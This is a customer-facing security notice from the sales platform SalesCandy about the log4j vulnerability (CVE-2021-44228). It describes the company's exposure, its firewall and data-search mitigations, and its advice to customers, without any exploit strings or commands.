SalesCandy is aware of a critical vulnerability (CVE-2021-44228 111 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228), first reported on Friday 10/12/2021. The vulnerability affects a logging library called log4j which is used by majority of Java-based applications. It is now known to be actively exploited since at least 2/12/2021.
We would like to assure our customers that SalesCandy does not use log4j and have determined from our cloud providers' reports (e.g. AWS; Elastic Cloud; Google Cloud) that they are either not susceptible or have taken the necessary steps to mitigate the vulnerability where applicable.
As a cautionary step, we have added new rules to our Web Application Firewall to detect and block inputs corresponding to the vulnerability.
Even so, we cannot underestimate the danger of inadvertently passing malicious data to our customers even if we are not susceptible to the vulnerability. We have conducted searches for user-supplied data (e.g. leads, actions logs) which may be evidence of attackers attempting to exploit the vulnerability and have not found any at this time. However, attackers are known to employ various methods that can obfuscate their data and evade detection and we cannot we sure we have missed anything. We are investigating methods to sanitise the data that we process in order to neutralise the threat.
We urge all customers to cautiously assess their lead generation platforms passing leads to SalesCandy and integrations with the Graph API or CandySync Webhook receiving leads from SalesCandy, and to apply necessary mitigations to ensure that any attacks are not passed through.
Please contact our Customer Success Team at support@salescandy.com if you encounter any data that looks suspicious or require more information about this subject.